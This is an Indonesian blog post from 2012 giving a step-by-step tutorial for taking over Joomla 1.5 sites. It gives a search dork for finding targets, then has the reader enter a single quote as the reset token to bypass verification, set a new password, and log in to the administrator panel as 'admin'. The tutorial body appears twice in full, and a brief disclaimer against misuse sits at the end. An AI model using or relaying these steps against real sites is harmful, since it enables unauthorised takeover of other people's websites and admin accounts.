Exploit Web Joomla V1.5
oke, yang kita cari disini adalah joomla versi 1.5
dork yang dipake yaitu option=com_user
nanti kalau sudah dapat target, misalkan targetnya adalah :
http://target.com/index.php?option=com_user&view=reset
atau
http://target.com/index.php?option=com_user&view=reset
atau
http://target.com/index.php?option=com_u...w=register
atau
http://target.com/index.php?option=com_user&view=login
atau
http://target.com/index.php?option=com_user&view=remind
maka yang harus dilakukan adalah mengganti view dengan mengganti view=reset dan layout=confirm
jadi contohnya adalah :
http://target.com/index.php?option=com_u...ut=confirm
nah... dari situ nantinya akan keluar form token, ngga perlu bingung kalo ngga tau harus input apa,
tinggal masukin kutip satu (') , kalau web tersebut belom di patch, maka akan masuk kedalam menu reset password
tinggal masukin aja deh password yang diinginkan, beres.
oke, tahap selanjutnya adalah dengan masuk kedalam menu administrator, misalkanhttp://target.com/administrator
nah, tinggal masukin deh username "admin" atau "administrator" dan password dengan password yang barusan diganti tadi.
selesai.
gampang kan ?
ayo, majukan kemampuan hacker indonesia !!!
dork yang dipake yaitu option=com_user
nanti kalau sudah dapat target, misalkan targetnya adalah :
http://target.com/index.php?option=com_user&view=reset
atau
http://target.com/index.php?option=com_user&view=reset
atau
http://target.com/index.php?option=com_u...w=register
atau
http://target.com/index.php?option=com_user&view=login
atau
http://target.com/index.php?option=com_user&view=remind
maka yang harus dilakukan adalah mengganti view dengan mengganti view=reset dan layout=confirm
jadi contohnya adalah :
http://target.com/index.php?option=com_u...ut=confirm
nah... dari situ nantinya akan keluar form token, ngga perlu bingung kalo ngga tau harus input apa,
tinggal masukin kutip satu (') , kalau web tersebut belom di patch, maka akan masuk kedalam menu reset password
tinggal masukin aja deh password yang diinginkan, beres.
oke, tahap selanjutnya adalah dengan masuk kedalam menu administrator, misalkanhttp://target.com/administrator
nah, tinggal masukin deh username "admin" atau "administrator" dan password dengan password yang barusan diganti tadi.
selesai.
gampang kan ?
ayo, majukan kemampuan hacker indonesia !!!
SAYA TIDAK MENGAJARKAN ANDA HARUS MELAKUKAN KEJAHATAN, NAMUN SAYA HANYA MEMBERIKAN ILMU UNTUK SEBUAH INFORMASI YANG ANDA KETAHUI "DILARANG KERAS MENYALAH GUNAKAN TUTORIAL INI"
Anda baru saja membaca artikel yang berkategori Hacking
dengan judul Exploit Web Joomla V1.5. Anda bisa bookmark halaman ini dengan URL http://catatan-lutfi.blogspot.com/2012/07/exploit-web-joomla-v15.html. Terima kasih!
Ditulis oleh:
Lutfi rahman - Selasa, 17 Juli 2012
Belum ada komentar untuk "Exploit Web Joomla V1.5"
Posting Komentar